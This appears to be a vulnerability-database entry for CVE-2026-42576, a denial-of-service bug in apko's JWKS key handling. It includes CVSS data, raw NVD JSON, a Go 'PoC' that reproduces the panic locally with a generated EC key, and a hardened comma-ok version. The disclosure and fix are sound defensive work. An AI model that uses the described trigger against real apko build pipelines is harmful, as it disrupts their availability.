Security Vulnerability Report
CVE-2026-42576 CVSS 6.5 MEDIUM

CVE-2026-42576

Published: 2026-05-09 20:16:30
Last Modified: 2026-05-09 20:16:30

Description

apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, DiscoverKeys in pkg/apk/apk/implementation.go unconditionally type-asserts JWKS keys as *rsa.PublicKey without checking the key type. If a repository JWKS endpoint returns a non-RSA key (e.g. EC), the unchecked assertion panics and crashes apko. This affects any workflow that initializes the APK database and fetches repository keys. This issue has been patched in version 1.2.7.

CVSS Details

CVSS Score
6.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H

Configurations (Affected Products)


apko < 1.2.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/rsa"
	"fmt"
)

// Simulate the vulnerable DiscoverKeys function
func vulnerableDiscoverKeys(key interface{}) {
	// Vulnerability: unconditional type assertion to *rsa.PublicKey
	rsaKey := key.(*rsa.PublicKey)
	fmt.Println("RSA Key found:", rsaKey)
}

func main() {
	// Generate an ECDSA key to simulate a non-RSA key from JWKS
	privKey, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	ecPubKey := &privKey.PublicKey

	fmt.Println("Attempting to process EC key as RSA key...")

	// Recover from the panic to demonstrate the crash
	defer func() {
		if r := recover(); r != nil {
			fmt.Println("[PoC Result] Panic triggered (DoS successful):", r)
		}
	}()

	// Trigger the vulnerability by passing an EC key to the function expecting RSA
	vulnerableDiscoverKeys(ecPubKey)
}
```
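The PoC above reproduces the crash. As an added example (not apko's own code), the same unchecked assertion is shown beside its comma-ok counterpart, together with a filter over a mixed key set that skips non-RSA entries instead of panicking. The function names, the error value and the generated keys are assumptions for illustration.

```go
package main

import (
	"crypto/ecdsa"
	"crypto/elliptic"
	"crypto/rand"
	"crypto/rsa"
	"errors"
	"fmt"
)

// ErrUnsupportedKeyType turns a non-RSA JWKS entry into a reportable error.
var ErrUnsupportedKeyType = errors.New("jwks: unsupported key type, expected *rsa.PublicKey")

// vulnerableAsRSA mirrors the pre-1.2.7 pattern: the unchecked assertion panics on any non-RSA key.
func vulnerableAsRSA(key interface{}) *rsa.PublicKey {
	return key.(*rsa.PublicKey)
}

// hardenedAsRSA is the comma-ok form: a non-RSA key becomes an error the caller can log or skip.
func hardenedAsRSA(key interface{}) (*rsa.PublicKey, error) {
	rsaKey, ok := key.(*rsa.PublicKey)
	if !ok {
		return nil, fmt.Errorf("%w: got %T", ErrUnsupportedKeyType, key)
	}
	return rsaKey, nil
}

// selectRSAKeys walks a mixed key set (as a repository JWKS endpoint might
// return), keeps the RSA keys and reports each skipped entry by index.
func selectRSAKeys(keys []interface{}) ([]*rsa.PublicKey, []error) {
	var kept []*rsa.PublicKey
	var skipped []error
	for i, k := range keys {
		if rsaKey, err := hardenedAsRSA(k); err != nil {
			skipped = append(skipped, fmt.Errorf("key %d: %w", i, err))
		} else {
			kept = append(kept, rsaKey)
		}
	}
	return kept, skipped
}

func main() {
	// Constructed key material: one EC key and one RSA key, as a JWKS might hold.
	ecPriv, _ := ecdsa.GenerateKey(elliptic.P256(), rand.Reader)
	rsaPriv, _ := rsa.GenerateKey(rand.Reader, 2048)
	kept, skipped := selectRSAKeys([]interface{}{&ecPriv.PublicKey, &rsaPriv.PublicKey})
	fmt.Printf("kept %d RSA key(s), skipped %d: %v\n", len(kept), len(skipped), skipped)
}
```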

References

https://github.com/chainguard-dev/apko/commit/6604826b19e36e9bc6e196592800fad93738f4a1
https://github.com/chainguard-dev/apko/releases/tag/v1.2.7
https://github.com/chainguard-dev/apko/security/advisories/GHSA-m7hm-vm4x-28jf
Raw JSON Data

```json
{
  "cve": {
    "id": "CVE-2026-42576",
    "sourceIdentifier": "[email protected]",
    "published": "2026-05-09T20:16:29.717",
    "lastModified": "2026-05-09T20:16:29.717",
    "vulnStatus": "Received",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "apko allows users to build and publish OCI container images built from apk packages. Prior to version 1.2.7, DiscoverKeys in pkg/apk/apk/implementation.go unconditionally type-asserts JWKS keys as *rsa.PublicKey without checking the key type. If a repository JWKS endpoint returns a non-RSA key (e.g. EC), the unchecked assertion panics and crashes apko. This affects any workflow that initializes the APK database and fetches repository keys. This issue has been patched in version 1.2.7."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
            "baseScore": 6.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "NONE",
            "integrityImpact": "NONE",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 3.6
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Primary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-704"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://github.com/chainguard-dev/apko/commit/6604826b19e36e9bc6e196592800fad93738f4a1",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/chainguard-dev/apko/releases/tag/v1.2.7",
        "source": "[email protected]"
      },
      {
        "url": "https://github.com/chainguard-dev/apko/security/advisories/GHSA-m7hm-vm4x-28jf",
        "source": "[email protected]"
      }
    ]
  }
}
```